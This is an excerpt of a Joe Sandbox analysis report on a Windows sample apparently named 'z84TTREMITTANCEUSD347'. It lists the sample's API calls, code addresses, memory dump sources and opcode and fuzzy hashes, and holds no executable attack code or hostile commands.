                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00444633
                                                                      • GetKeyboardState.USER32(?), ref: 00444648
                                                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      Similarity
                                                                      • API ID: __snwprintf__wcsicoll_wcscpy
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                      • API String ID: 1729044348-3025626884
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                                      Similarity
                                                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                      • String ID:
                                                                      • API String ID: 2354583917-0
                                                                      APIs
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      Similarity
                                                                      • API ID: Window$Enable$Show$MessageMoveSend
                                                                      • String ID:
                                                                      • API String ID: 896007046-0
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                      • GetFocus.USER32 ref: 00448ACF
                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      Similarity
                                                                      • API ID: Window$Enable$Show$FocusMessageSend
                                                                      • String ID:
                                                                      • API String ID: 3429747543-0
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                      • __swprintf.LIBCMT ref: 0045D4E9
                                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu$\VH
                                                                      • API String ID: 3164766367-2432546070
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 3850602802-3636473452
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 0041F707
                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                      • _free.LIBCMT ref: 0041F71A
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free_malloc
                                                                      • String ID: [B
                                                                      • API String ID: 1020059152-632041663
                                                                      • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                      • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                      • __calloc_crt.LIBCMT ref: 00413DB0
                                                                      • __getptd.LIBCMT ref: 00413DBD
                                                                      • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                      • _free.LIBCMT ref: 00413E07
                                                                      • __dosmaperr.LIBCMT ref: 00413E12
                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                      • String ID:
                                                                      • API String ID: 155776804-0
                                                                      • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                      • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                      • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                      • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                      APIs
                                                                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                      • ExitThread.KERNEL32 ref: 00413D4E
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                      • __freefls@4.LIBCMT ref: 00413D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                      • String ID:
                                                                      • API String ID: 259663610-0
                                                                      • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                      • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                      • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                      • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                      • GetClientRect.USER32(?,?), ref: 00430364
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                      • String ID:
                                                                      • API String ID: 3220332590-0
                                                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1612042205-0
                                                                      • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                      • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strncmp
                                                                      • String ID: >$U$\
                                                                      • API String ID: 2666721431-237099441
                                                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$InputSend
                                                                      • String ID:
                                                                      • API String ID: 2221674350-0
                                                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$_wcscat
                                                                      • String ID:
                                                                      • API String ID: 2037614760-0
                                                                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                      • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                      • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                      • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Copy$AllocClearErrorLastString
                                                                      • String ID:
                                                                      • API String ID: 960795272-0
                                                                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                      Similarity
                                                                      • API ID: File$Delete$Copy__fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 2446588422-0
                                                                      • Opcode ID: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                      • Instruction ID: e3b766f0d7570c057f36e817525b07a345c540c94ec9958bdefdc59333e68e6d
                                                                      • Opcode Fuzzy Hash: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                                      • Instruction Fuzzy Hash: D9517CB26083409BC320DF6AD984AAFB7E8FBD9740F10492FF68983201DA75D548CB56
                                                                      APIs
                                                                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                                      Similarity
                                                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                      • String ID:
                                                                      • API String ID: 4189319755-0
                                                                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 1976402638-0
                                                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                      APIs
                                                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                      Similarity
                                                                      • API ID: Variant$Copy$ClearErrorLast
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 2487901850-572801152
                                                                      • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                      • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
